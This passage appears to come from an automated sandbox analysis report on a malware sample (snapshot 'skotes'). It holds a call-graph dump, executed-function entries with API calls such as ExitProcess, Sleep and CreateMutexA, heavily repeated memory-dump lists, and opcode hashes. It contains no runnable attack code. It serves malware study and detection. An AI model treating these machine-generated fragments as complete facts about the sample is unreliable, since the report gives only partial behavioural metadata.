10284->10285 10286 405c10 3 API calls 10285->10286 10287 409b7c 10286->10287 10288 408b30 3 API calls 10287->10288 10289 409b8d 10288->10289 10290 405c10 3 API calls 10289->10290 10291 409cb1 10290->10291 10292 408b30 3 API calls 10291->10292 10293 409cc2 10292->10293 9941 40cc79 9943 40cc84 shared_ptr 9941->9943 9942 40ccda shared_ptr __floor_pentium4 9943->9942 9947 405c10 9943->9947 9945 40ce9d 9965 40ca70 9945->9965 9948 405c54 9947->9948 9975 404b30 9948->9975 9950 405d17 shared_ptr __floor_pentium4 9950->9945 9951 405c7b __cftof 9951->9950 9952 405c10 3 API calls 9951->9952 9953 4066ac 9952->9953 9954 405c10 3 API calls 9953->9954 9955 4066b1 9954->9955 9979 4022c0 9955->9979 9957 4066c9 shared_ptr 9958 405c10 3 API calls 9957->9958 9959 40673d 9958->9959 9960 4022c0 3 API calls 9959->9960 9962 406757 shared_ptr 9960->9962 9961 405c10 3 API calls 9961->9962 9962->9961 9963 4022c0 3 API calls 9962->9963 9964 406852 shared_ptr __floor_pentium4 9962->9964 9963->9962 9964->9945 9967 40cadd 9965->9967 9966 40ccda shared_ptr __floor_pentium4 9968 405c10 3 API calls 9967->9968 9973 40cc87 9967->9973 9969 40ccf9 9968->9969 10124 409030 9969->10124 9971 405c10 3 API calls 9972 40ce9d 9971->9972 9974 40ca70 3 API calls 9972->9974 9973->9966 9973->9971 9977 404ce5 9975->9977 9978 404b92 9975->9978 9977->9951 9978->9977 9982 436da6 9978->9982 10008 402280 9979->10008 9983 436db4 9982->9983 9985 436dc2 9982->9985 9987 436d19 9983->9987 9985->9978 9988 43690a __cftof 3 API calls 9987->9988 9989 436d2c 9988->9989 9992 436d52 9989->9992 9991 436d3d 9991->9978 9993 436d8f 9992->9993 9994 436d5f 9992->9994 10003 43b67d 9993->10003 9997 436d6e 9994->9997 9998 43b6a1 9994->9998 9997->9991 9999 43690a __cftof 3 API calls 9998->9999 10000 43b6be 9999->10000 10001 43f1bf __cftof 3 API calls 10000->10001 10002 43b6ce __floor_pentium4 10000->10002 10001->10002 10002->9997 10004 43a671 __cftof 3 API calls 10003->10004 10005 43b688 10004->10005 10006 43b5fb __cftof 3 API calls 10005->10006 10007 43b698 10006->10007 10007->9997 10009 402296 10008->10009 10012 4387f8 10009->10012 10015 437609 10012->10015 10014 4022a4 10014->9957 10016 437649 10015->10016 10020 437631 __cftof __dosmaperr __floor_pentium4 10015->10020 10017 43690a __cftof 3 API calls 10016->10017 10016->10020 10018 437661 10017->10018 10021 437bc4 10018->10021 10020->10014 10023 437bd5 10021->10023 10022 437be4 __cftof __dosmaperr 10022->10020 10023->10022 10028 438168 10023->10028 10033 437dc2 10023->10033 10038 437de8 10023->10038 10048 437f36 10023->10048 10029 438171 10028->10029 10031 438178 10028->10031 10057 437b50 10029->10057 10031->10023 10032 438177 10032->10023 10034 437dcb 10033->10034 10036 437dd2 10033->10036 10035 437b50 3 API calls 10034->10035 10037 437dd1 10035->10037 10036->10023 10037->10023 10039 437def 10038->10039 10042 437e09 __cftof __dosmaperr 10038->10042 10041 437fa2 10039->10041 10039->10042 10043 437f69 10039->10043 10045 437f77 10039->10045 10047 437f8b 10041->10047 10071 438390 10041->10071 10042->10023 10043->10045 10043->10047 10075 438241 10043->10075 10045->10047 10079 4386ea 10045->10079 10047->10023 10049 437f4f 10048->10049 10050 437f69 10048->10050 10049->10050 10051 437f77 10049->10051 10054 437fa2 10049->10054 10050->10051 10052 437f8b 10050->10052 10053 438241 3 API calls 10050->10053 10051->10052 10056 4386ea 3 API calls 10051->10056 10052->10023 10053->10051 10054->10052 10055 438390 3 API calls 10054->10055 10055->10051 10056->10052 10058 437b62 __dosmaperr 10057->10058 10061 438ab6 10058->10061 10060 437b85 __dosmaperr 10060->10032 10062 438ad1 10061->10062 10065 438868 10062->10065 10064 438adb 10064->10060 10066 43887a 10065->10066 10067 43690a __cftof GetPEB ExitProcess GetPEB 10066->10067 10070 43888f __cftof __dosmaperr 10066->10070 10069 4388bf 10067->10069 10068 436d52 GetPEB ExitProcess GetPEB 10068->10069 10069->10068 10069->10070 10070->10064 10072 4383ab 10071->10072 10073 4383dd 10072->10073 10083 43c88e 10072->10083 10073->10045 10076 43825a 10075->10076 10090 43d3c8 10076->10090 10078 43830d 10078->10045 10080 43875d __floor_pentium4 10079->10080 10082 438707 10079->10082 10080->10047 10081 43c88e __cftof 3 API calls 10081->10082 10082->10080 10082->10081 10086 43c733 10083->10086 10085 43c8a6 10085->10073 10087 43c743 10086->10087 10088 43c748 __cftof __dosmaperr 10087->10088 10089 43690a __cftof GetPEB ExitProcess GetPEB 10087->10089 10088->10085 10089->10088 10092 43d3ee 10090->10092 10102 43d3d8 __cftof __dosmaperr 10090->10102 10091 43d485 10094 43d4e4 10091->10094 10095 43d4ae 10091->10095 10092->10091 10093 43d48a 10092->10093 10092->10102 10103 43cbdf 10093->10103 10120 43cef8 10094->10120 10097 43d4b3 10095->10097 10098 43d4cc 10095->10098 10109 43d23e 10097->10109 10116 43d0e2 10098->10116 10102->10078 10104 43cbf1 10103->10104 10105 43690a __cftof GetPEB ExitProcess GetPEB 10104->10105 10106 43cc05 10105->10106 10107 43cef8 GetPEB ExitProcess GetPEB 10106->10107 10108 43cc0d __alldvrm __cftof __dosmaperr _strrchr 10106->10108 10107->10108 10108->10102 10110 43d26c 10109->10110 10111 43d2de 10110->10111 10113 43d2b7 10110->10113 10114 43d2a5 10110->10114 10112 43cf9a GetPEB ExitProcess GetPEB 10111->10112 10112->10114 10115 43d16d GetPEB ExitProcess GetPEB 10113->10115 10114->10102 10115->10114 10117 43d10f 10116->10117 10118 43d14e 10117->10118 10119 43d16d GetPEB ExitProcess GetPEB 10117->10119 10118->10102 10119->10118 10121 43cf10 10120->10121 10122 43cf75 10121->10122 10123 43cf9a GetPEB ExitProcess GetPEB 10121->10123 10122->10102 10123->10122 10125 409080 10124->10125 10126 405c10 3 API calls 10125->10126 10127 40909a shared_ptr __floor_pentium4 10126->10127 10127->9973 10483 438bbe 10484 438868 3 API calls 10483->10484 10485 438bdc 10484->10485

                                                                                                                                              Executed Functions

                                                                                                                                              Function 0043652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 342 43652b-436538 call 43a302 345 43655a-43656c call 43656d ExitProcess 342->345 346 43653a-436548 GetPEB 342->346 346->345 347 43654a-436559 346->347 347->345
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(?,?,0043652A,?,?,?,?,?,00437661), ref: 00436567
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: fb80626982b262634caa4b5bf321e071362ad8fbc3e646cd5e86da00f0e14d96
                                                                                                                                              • Instruction ID: 347401e82e2ce368ec67d0b7a1438cb3f98d74491b21c67c5e52476e627dbb70
                                                                                                                                              • Opcode Fuzzy Hash: fb80626982b262634caa4b5bf321e071362ad8fbc3e646cd5e86da00f0e14d96
                                                                                                                                              • Instruction Fuzzy Hash: 84E0CD301401087FCF35BB19D80DD893B6AEF55745F01681AFD1946325CB7DDE41CA44
                                                                                                                                              Function 00409BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 2bd517f86cc9c56b17f6ece36318f98bbdea54a1f64f6af63bada989ba6cf72f
                                                                                                                                              • Instruction ID: a2ee0a43738e0e879010d75a359999d2292c472e5c233bec0c4700595a4d6dbd
                                                                                                                                              • Opcode Fuzzy Hash: 2bd517f86cc9c56b17f6ece36318f98bbdea54a1f64f6af63bada989ba6cf72f
                                                                                                                                              • Instruction Fuzzy Hash: 25313B71B042008BFB18DB68DD8979DB7B2ABC2310F20863EE014A73D6C77D5981875A
                                                                                                                                              Function 00409F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 22 409f44-409f64 26 409f92-409fae 22->26 27 409f66-409f72 22->27 30 409fb0-409fbc 26->30 31 409fdc-409ffb 26->31 28 409f74-409f82 27->28 29 409f88-409f8f call 41d663 27->29 28->29 36 40a92b 28->36 29->26 32 409fd2-409fd9 call 41d663 30->32 33 409fbe-409fcc 30->33 34 40a029-40a916 call 4180c0 31->34 35 409ffd-40a009 31->35 32->31 33->32 33->36 39 40a00b-40a019 35->39 40 40a01f-40a026 call 41d663 35->40 42 40a953-40a994 Sleep CreateMutexA 36->42 43 40a92b call 436c6a 36->43 39->36 39->40 40->34 51 40a996-40a998 42->51 52 40a9a7-40a9a8 42->52 43->42 51->52 54 40a99a-40a9a5 51->54 54->52
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 5f929725958bd8730a38da44316df6685d769b60bbbf0485c403cb570bad9e0d
                                                                                                                                              • Instruction ID: 1df7dec1b7803797c04f07b09582047cb315edceb598c142c986f431d2e640d3
                                                                                                                                              • Opcode Fuzzy Hash: 5f929725958bd8730a38da44316df6685d769b60bbbf0485c403cb570bad9e0d
                                                                                                                                              • Instruction Fuzzy Hash: C93127717002049BEB18DB68DD887ADB762EB86314F24863FE018E73D5D77D4990875A
